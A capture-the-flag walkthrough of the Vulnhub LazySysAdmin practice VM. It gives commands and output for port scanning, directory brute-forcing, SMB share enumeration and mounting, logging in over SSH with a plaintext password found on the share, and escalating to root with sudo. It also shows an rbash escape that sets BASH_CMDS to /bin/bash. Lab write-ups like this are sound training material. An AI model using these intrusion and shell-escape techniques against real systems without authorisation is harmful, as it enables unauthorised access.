Vulnhub LazySysAdmin Walkthrough


Quick write-up of LazySysAdmin, found here: https://www.vulnhub.com/entry/lazysysadmin-1,205/

This is labeled as “beginner-intermediate” but probably leaning more on the beginner side. Anyhow…let’s do this!

Basic nmap scan…

root@kali:~/vulnhub/lazysysadmin# nmap -sS -sV 172.16.115.134 -oA lazy

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-06 00:08 EST
Nmap scan report for 172.16.115.134
Host is up (0.00047s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
MAC Address: 00:0C:29:CE:7D:7F (VMware)
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.06 seconds

Check the basics…

root@kali:~/vulnhub/lazysysadmin# curl http://172.16.115.134/robots.txt
User-agent: *
Disallow: /old/
Disallow: /test/
Disallow: /TR2/
Disallow: /Backnode_files/

Checking those directories yields nothing of interest…moving on. Let’s do a quick directory brute-force.

root@kali:~/vulnhub/lazysysadmin# gobuster -u http://172.16.115.134 -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://172.16.115.134/
[+] Threads      : 10
[+] Wordlist     : /usr/share/seclists/Discovery/Web_Content/common.txt
[+] Status codes : 301,302,307,403,500,200,204
[+] Expanded     : true
=====================================================
http://172.16.115.134/.htpasswd (Status: 403)
http://172.16.115.134/.hta (Status: 403)
http://172.16.115.134/.htaccess (Status: 403)
http://172.16.115.134/apache (Status: 301)
http://172.16.115.134/index.html (Status: 200)
http://172.16.115.134/info.php (Status: 200)
http://172.16.115.134/javascript (Status: 301)
http://172.16.115.134/old (Status: 301)
http://172.16.115.134/phpmyadmin (Status: 301)
http://172.16.115.134/robots.txt (Status: 200)
http://172.16.115.134/server-status (Status: 403)
http://172.16.115.134/test (Status: 301)
http://172.16.115.134/wordpress (Status: 301)
http://172.16.115.134/wp (Status: 301)
=====================================================

WordPress, phpinfo, phpmyadmin…noted. Let’s see what else we can find on this box. We saw TCP 139 and 445 open. Let’s probe them with enum4linux.

root@kali:~/vulnhub/lazysysadmin# enum4linux 172.16.115.134
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Nov  6 00:39:14 2017

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 172.16.115.134
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ====================================================== 
|    Enumerating Workgroup/Domain on 172.16.115.134    |
 ====================================================== 
[+] Got domain/workgroup name: WORKGROUP

[...SNIP...]
 =========================================== 
|    Share Enumeration on 172.16.115.134    |
 =========================================== 
WARNING: The "syslog" option is deprecated
OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

  Sharename       Type      Comment
  ---------       ----      -------
  print$          Disk      Printer Drivers
  share$          Disk      Sumshare
  IPC$            IPC       IPC Service (Web server)

  Server               Comment
  ---------            -------

  Workgroup            Master
  ---------            -------
  WORKGROUP            LAZYSYSADMIN

[+] Attempting to map shares on 172.16.115.134
//172.16.115.134/print$	Mapping: DENIED, Listing: N/A
//172.16.115.134/share$	Mapping: OK, Listing: OK
//172.16.115.134/IPC$	Mapping: OK	Listing: DENIED
[...SNIP...]
S-1-22-1-1000 Unix User\togie (Local User)

Well…that looks interesting. Leaving a misconfigured share is something a Lazy Sys Admin might do. We also have a local user named “togie.” Let’s see what we can find in the share.

First, we mount the share, and then start poking around…

root@kali:~/vulnhub/lazysysadmin# mkdir /mnt/cifs
root@kali:~/vulnhub/lazysysadmin# mount -t cifs //172.16.115.134/share$ -o username=guest /mnt/cifs/
root@kali:~/vulnhub/lazysysadmin# ls /mnt/cifs/
Backnode_files  apache  deets.txt  index.html  info.php  old  robots.txt  test  todolist.txt  wordpress  wp
root@kali:~/vulnhub/lazysysadmin# cat /mnt/cifs/deets.txt 
CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345

Surely, 12345 can’t be a real user’s password? How about a lazy sysadmin’s password? Let’s try it with our the user we found earlier…

root@kali:~/vulnhub/lazysysadmin# ssh togie@172.16.115.134
##################################################################################################
#                                          Welcome to Web_TR1                                    #
#                             All connections are monitored and recorded                         # 
#                    Disconnect IMMEDIATELY if you are not an authorized user!                   # 
##################################################################################################

togie@172.16.115.134's password: 
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Mon Nov  6 16:01:52 AEST 2017

  System load:  0.0               Processes:           179
  Usage of /:   46.1% of 2.89GB   Users logged in:     0
  Memory usage: 33%               IP address for eth0: 172.16.115.134
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

133 packages can be updated.
0 updates are security updates.
togie@LazySysAdmin:~$

/facepalm

Ok…now we’re in as togie. Does this user have sudo access?

togie@LazySysAdmin:~$ sudo su
[sudo] password for togie: 
root@LazySysAdmin:/home/togie#
root@LazySysAdmin:/home/togie# ls /root
proof.txt
root@LazySysAdmin:/home/togie# cat /root/proof.txt 
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851


Well done 🙂

Hope you learn't a few things along the way.

Regards,

Togie Mcdogie




Enjoy some random strings

WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu

/doublefacepalm…apparently it does. Game over!

There were a few rabbit holes you could’ve gone down on this VM. One being that if you didn’t try for sudo access right away, you would’ve noticed that togie was configured to use /bin/rbash, or “restricted bash” which prevents you from running certain commands.

togie@LazySysAdmin:~$ cd /tmp
-rbash: cd: restricted
togie@LazySysAdmin:~$ echo $SHELL
/bin/rbash

One easy way I’ve found to escape rbash is due to a vulnerability in which the BASH_CMDS environment variable is writeable from within rbash. I stumbled across this in my OSCP travels, and my inner 12 year-old appreciates it because I get to call it the “poop” vulnerability. See why: https://lists.gnu.org/archive/html/bug-bash/2017-03/msg00076.html

Anyhow…if we execute what is shown in the link, we confirm that we can escape rbash.

root@kali:~/vulnhub/lazysysadmin# ssh togie@172.16.115.134
##################################################################################################
#                                          Welcome to Web_TR1                                    #
#                             All connections are monitored and recorded                         # 
#                    Disconnect IMMEDIATELY if you are not an authorized user!                   # 
##################################################################################################

togie@172.16.115.134's password: 
[...SNIP...]
togie@LazySysAdmin:~$ cd /tmp
-rbash: cd: restricted
togie@LazySysAdmin:~$ BASH_CMDS[poop]=/bin/bash
togie@LazySysAdmin:~$ poop
togie@LazySysAdmin:~$ cd /tmp
togie@LazySysAdmin:/tmp$ ls -lah
total 8.0K
4.0K drwxrwxrwt  2 root root 4.0K Nov  6 16:17 .
4.0K drwxr-xr-x 22 root root 4.0K Aug 21 20:10 ..

I didn’t experiment with any other methods of privilege escalation, but I suspect there’s one more…perhaps if I have time, I’ll go back and check it out.